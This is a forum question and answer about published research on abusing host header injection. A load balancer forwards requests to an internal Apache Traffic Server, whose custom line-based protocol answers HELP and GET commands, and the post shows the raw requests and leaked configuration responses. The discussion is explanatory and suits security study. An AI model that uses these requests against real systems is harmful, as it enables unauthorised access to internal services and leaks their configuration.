Abusing Host Header Injection to access customized Apache Traffic Server Protocol

Question

I came across a HTTP HELP method (https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface chapter "Invalid Host") and asked myself: Are there any more systems that offer something like that?

I was wondering how did the pentester come up with this method.

Google couldn't help me here.

In the specific case, it was about an Apache Traffic Server, whose help could be queried as follows:

HELP / HTTP / 1.1
Host: XX.X.XXX.XX: 8082
        
HTTP / 1.1 200 Connection Established
Date: Tue, 07 Feb 2017 16:33:59 GMT
Transfer encoding: chunked
Connection: keep-alive
        
OK
        
  Traffic Server Overseer Port
        
  commands:
    get <variable-list>
    set <variable-name> = "<value>"
    help
    exit
        
  example:
        
    OK
    get proxy.node.cache.contents.bytes_free
    proxy.node.cache.contents.bytes_free = "56616048"
    OK

 Variable lists are conf / yts / stats records, separated by commas

And then applied specifically as follows:

GET / HTTP / 1.1
Host: XX.X.XXX.XX: 8082
Content-Length: 34
        
GET proxy.config.alarm_email
        
HTTP / 1.1 200 Connection Established
Date: Tue, 07 Feb 2017 16:57:02 GMT
Transfer encoding: chunked
Connection: keep alive
...
proxy.config.alarm_email = "[email protected]"  

Answer 1

I figured out the answer:

This is a protocol specially customized for an Apache Traffic Server by Yahoo. Apache Traffic Server allows you to create your own protocols using the "New Protocols Plugin": https://docs.trafficserver.apache.org/en/latest/developer-guide/plugins/new-protocol-plugins.en.html.

The protocol created here appears to be line-based.

The scenario was as follows:

An initial load balancer evaluated the host header in the incoming HTTP request in such a way that it forwarded the incoming request to the location entered there. This means that the attacker could determine to which internal location the request should be routed, in this case to an Apache traffic server sitting at IP:Port XX.X.XXX.XX: 8082. The underlying attack was a host header injection (https://portswigger.net/web-security/host-header).

The line-based self-made protocol now evaluated the individual lines of the HTTP request. This is how the information shown was achieved (like explained here https://www.youtube.com/watch?v=zP4b3pw94s0&feature=youtu.be&t=12m40s) .

This means that the attacker was able to address the internal Apache traffic server via an HTTP request and the individual lines of the request were each understood as individual commands.

A HELP command has now been implemented by Yahoo here.